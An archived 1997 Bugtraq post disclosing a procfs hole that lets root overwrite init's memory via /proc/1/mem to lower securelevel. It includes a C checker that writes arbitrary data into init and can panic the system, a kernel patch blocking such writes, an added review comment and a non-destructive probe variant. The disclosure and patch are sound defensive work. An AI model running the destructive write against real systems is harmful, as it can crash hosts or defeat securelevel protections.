Bugtraq mailing list archives
procfs take II
From: brian () FIREHOUSE NET (Brian Mitchell)
Date: Sat, 6 Sep 1997 02:53:25 -0400
There is a slight procfs hole that could allow an intruder to lower the
securelevel. init's memory is not protected, so you can overwrite
data/instructions in init and possibly lower the securelevel (although
panicking the system is much more likely). Enclosed is a vulnerability
checker:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>

int main(void)
{
    int tqbf = 31337;   /* value that gets written into init's image */
    int fd;
    int g0nz0;          /* return value of the write() */
    int err = 0;        /* errno from the write(), saved before close() */

    if (getuid()) {
        fprintf(stderr, "this attack needs root\n");
        exit(1);
    }
    fd = open("/proc/1/mem", O_RDWR);
    if (fd < 0) {
        fprintf(stderr, "open of /proc/1/mem failed: %s\n", strerror(errno));
        exit(2);
    }
    /* 0x1000 is an arbitrary offset into init's address space; the write is
       destructive and can crash init or panic the box, as the post warns */
    if (lseek(fd, 0x1000, SEEK_SET) == (off_t)-1) {
        fprintf(stderr, "lseek on /proc/1/mem failed: %s\n", strerror(errno));
        exit(3);
    }
    g0nz0 = write(fd, &tqbf, sizeof(int));
    err = errno;
    close(fd);
    if (g0nz0 >= 0)
        fprintf(stderr, "procfs is vulnerable!\n");
    else
        fprintf(stderr, "procfs is not vulnerable! (write: %s)\n", strerror(err));
    printf("returned %d\n", g0nz0);
    return 0;
}
Here is a simple patch; it disallows writes to pid 1's mem node if
securelevel is > 0 (the diff is based on a 2.2.1 box with the securelevel fix
applied):
*** procfs_mem.c Sat Sep 6 02:36:39 1997
--- procfs_mem.c.new Sat Sep 6 02:38:25 1997
***************
*** 316,321 ****
--- 316,325 ----
!(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
uio->uio_rw == UIO_READ))
return EPERM;
+
+ /* writing to init memory while securelevel > 0 is bad */
+ if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
+ return EPERM;
error = procfs_rwmem(p, uio);
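Review bot: the added check identifies init by the literal `p->p_pid == 1`; the kernel already keeps a pointer to the init process, so `p == initproc` would state the intent without a magic number and would track init however it is located elsewhere in the kernel. The comment `/* writing to init memory while securelevel > 0 is bad */` should also say why init is special (it is the process able to lower securelevel, which is exactly what the post says an attacker would do through this write), since "is bad" leaves the next reader guessing. Placement is right: the test sits before `procfs_rwmem(p, uio)` and after the existing KMEM_GROUP read exception, so reads of init by root are still permitted and only the write path is refused with EPERM, matching the described fix.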
Brian Mitchell brian () firehouse net
"BSD code sucks. Of course, everything else sucks far more."
- Theo de Raadt (OpenBSD President)
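A non-destructive variant of the checker above, as an added example that is not part of Brian Mitchell's post: instead of writing 31337 into init, it reads a few bytes at the offset and writes the identical bytes back, so a vulnerable kernel is detected without altering init's image, while a kernel carrying the patch above still refuses the write with EPERM. The path, offset and the probe_writeback/selftest_on_tempfile names are this example's own choices; probing /proc/1/mem still requires root, and the self-check runs on an ordinary temp file with constructed content so it can be exercised offline.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Outcome of one probe. */
enum probe_result {
    PROBE_ERROR = -1,   /* open/seek/read/write failed for a non-permission reason */
    PROBE_REFUSED = 0,  /* open or write refused with EPERM/EACCES: not vulnerable */
    PROBE_WRITABLE = 1  /* write-back succeeded: the node is writable */
};

/*
 * Non-destructive writability probe: read LEN bytes at OFF from PATH, then
 * write the same bytes back to the same offset.  The target's content is
 * unchanged either way; what is tested is whether the kernel lets the write
 * through.  *ERR receives errno on failure (0 on success).
 * Uses lseek+read/write rather than pread/pwrite so it matches the original
 * checker and builds on the 2.2-era systems the post is about.
 */
int probe_writeback(const char *path, off_t off, size_t len, int *err)
{
    unsigned char buf[64];
    int fd, saved;
    ssize_t n;

    *err = 0;
    if (len == 0 || len > sizeof buf) {
        *err = EINVAL;
        return PROBE_ERROR;
    }
    fd = open(path, O_RDWR);
    if (fd < 0) {
        *err = errno;
        return (errno == EPERM || errno == EACCES) ? PROBE_REFUSED : PROBE_ERROR;
    }
    if (lseek(fd, off, SEEK_SET) == (off_t)-1) {
        saved = errno; close(fd); *err = saved; return PROBE_ERROR;
    }
    n = read(fd, buf, len);
    if (n != (ssize_t)len) {
        saved = n < 0 ? errno : EIO; close(fd); *err = saved; return PROBE_ERROR;
    }
    if (lseek(fd, off, SEEK_SET) == (off_t)-1) {
        saved = errno; close(fd); *err = saved; return PROBE_ERROR;
    }
    n = write(fd, buf, len);        /* same bytes, same place: no change to the target */
    saved = errno;
    close(fd);
    if (n == (ssize_t)len)
        return PROBE_WRITABLE;
    *err = n < 0 ? saved : EIO;
    return (n < 0 && (saved == EPERM || saved == EACCES)) ? PROBE_REFUSED : PROBE_ERROR;
}

/*
 * Offline self-check on an ordinary temp file holding constructed sample
 * bytes: the probe must report the file writable and leave it untouched.
 * Returns 1 on success, 0 otherwise.
 */
int selftest_on_tempfile(void)
{
    static const char content[] = "constructed sample bytes";  /* constructed input */
    char path[] = "/tmp/procfs_probe_XXXXXX";
    char alt[] = "./procfs_probe_XXXXXX";
    char back[sizeof content];
    int fd, err, ok = 0;
    const char *used = path;

    fd = mkstemp(path);
    if (fd < 0) { fd = mkstemp(alt); used = alt; }   /* fall back to cwd if /tmp is unusable */
    if (fd < 0) return 0;
    if (write(fd, content, sizeof content) == (ssize_t)sizeof content &&
        probe_writeback(used, 4, 8, &err) == PROBE_WRITABLE &&
        lseek(fd, 0, SEEK_SET) == 0 &&
        read(fd, back, sizeof back) == (ssize_t)sizeof back &&
        memcmp(back, content, sizeof content) == 0)
        ok = 1;
    close(fd);
    unlink(used);
    return ok;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/proc/1/mem";
    off_t off = argc > 2 ? (off_t)strtoul(argv[2], NULL, 0) : 0x1000;
    int err, r;

    if (argc == 1 && getuid() != 0) {
        fprintf(stderr, "probing %s needs root\n", path);
        return 1;
    }
    r = probe_writeback(path, off, sizeof(int), &err);
    if (r == PROBE_WRITABLE)
        printf("%s: writable at 0x%lx, procfs is vulnerable\n", path, (unsigned long)off);
    else if (r == PROBE_REFUSED)
        printf("%s: write refused (%s), not vulnerable\n", path, strerror(err));
    else
        printf("%s: probe failed (%s)\n", path, strerror(err));
    return r == PROBE_WRITABLE ? 0 : 2;
}
```

Run as root with no arguments to probe /proc/1/mem at 0x1000, or pass a path and offset to probe some other mem node. A write of the unchanged bytes still goes through the procfs write path, so the patched kernel answers it with EPERM exactly as it would answer the destructive write, which is the property that makes the read-back-then-write-back probe a faithful but safe substitute for the original checker.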